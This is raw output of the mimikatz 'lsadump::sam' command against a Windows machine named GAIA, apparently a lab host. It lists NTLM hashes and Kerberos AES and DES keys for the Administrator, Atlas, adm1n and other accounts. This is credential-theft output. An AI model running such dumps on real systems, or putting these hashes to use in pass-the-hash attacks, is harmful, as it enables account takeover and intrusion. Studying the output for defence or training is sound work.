mimikatz # lsadump::sam
Domain : GAIA
SysKey : 36c8d26ec0df8b23ce63bcefa6e2d821
Local SID : S-1-5-21-1966530601-3185510712-10604624

SAMKey : 6e708461100b4988991ce3b4d8b1784e

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: c16444961f67af7eea7e420b65c8c3eb

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : efd8f5fd23c3b910ef609e3e872276c8

* Primary:Kerberos-Newer-Keys *
    Default Salt : CHANGE-MY-HOSTNAMEAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : c3bfc4a1912ab98abb75ad9d11aa511e30673f6c495066a811032df9756b9f3e
      aes128_hmac       (4096) : 6fbcc5a35c6507e1dd2c51521557b3b6
      des_cbc_md5       (4096) : 9ba7cdb3972013cd
    OldCredentials
      aes256_hmac       (4096) : 9484aadacd6c5994aed633bf92b6b3db31c57c932d2cd84a7fa635a0b3262806
      aes128_hmac       (4096) : cdda685dd630dd0796e5ddf38e22dce5
      des_cbc_md5       (4096) : 08340db613fb46b5
    OlderCredentials
      aes256_hmac       (4096) : 50141e3b3b449512e393a66c32e7f89a131744eef5d8a3f6a8576919a810cda3
      aes128_hmac       (4096) : 0d717b42dbaf77bb7248b4bebf8bb3a6
      des_cbc_md5       (4096) : bc23a20170542f25

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : CHANGE-MY-HOSTNAMEAdministrator
    Credentials
      des_cbc_md5       : 9ba7cdb3972013cd
    OldCredentials
      des_cbc_md5       : 08340db613fb46b5


RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: 58f8e0214224aebc2c5f82fb7cb47ca1

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : a1528cd40d99e5dfa9fa0809af998696

* Primary:Kerberos-Newer-Keys *
    Default Salt : WDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 3ff137e53cac32e3e3857dc89b725fd62ae4eee729c1c5c077e54e5882d8bd55
      aes128_hmac       (4096) : 15ac5054635c97d02c174ee3aa672227
      des_cbc_md5       (4096) : ce9b2cabd55df4ce

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WDAGUtilityAccount
    Credentials
      des_cbc_md5       : ce9b2cabd55df4ce


RID  : 000003f0 (1008)
User : Atlas
  Hash NTLM: 95ab4a5008e6266db4124279bbf2d70c

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 9a29c51aca19edf492ca5543c224fd93

* Primary:Kerberos-Newer-Keys *
    Default Salt : GAIAAtlas
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : 31b9d2630afe8409043cf0aff5d14cac90b2b12655be040bb11de51ca098ecaa
      aes128_hmac       (4096) : f1907d517c4a8cc9cb5e2c4607a47f2c
      des_cbc_md5       (4096) : f8efef5e3ece8076
    OldCredentials
      aes256_hmac       (4096) : ba311b1a6f964cdcb2988045aad04074458aab5264fdbdb394a6614476353350
      aes128_hmac       (4096) : 1a8cb078c086419390f2dfc8e81e3e18
      des_cbc_md5       (4096) : dff41c61ea4967c8

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : GAIAAtlas
    Credentials
      des_cbc_md5       : f8efef5e3ece8076
    OldCredentials
      des_cbc_md5       : dff41c61ea4967c8


RID  : 000003f1 (1009)
User : adm1n
  Hash NTLM: e19ccf75ee54e06b06a5907af13cef42

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 138c34ce13a32e1d39d3494126825325

* Primary:Kerberos-Newer-Keys *
    Default Salt : GAIAadm1n
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : c8c242756234f40bcc0f4fd115fde31bf7103b57f0a3e9d4b687878908132548
      aes128_hmac       (4096) : 93b364e4c0918b89ac64d429ceb37283
      des_cbc_md5       (4096) : bc3215971f7c4525

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : GAIAadm1n
    Credentials
      des_cbc_md5       : bc3215971f7c4525
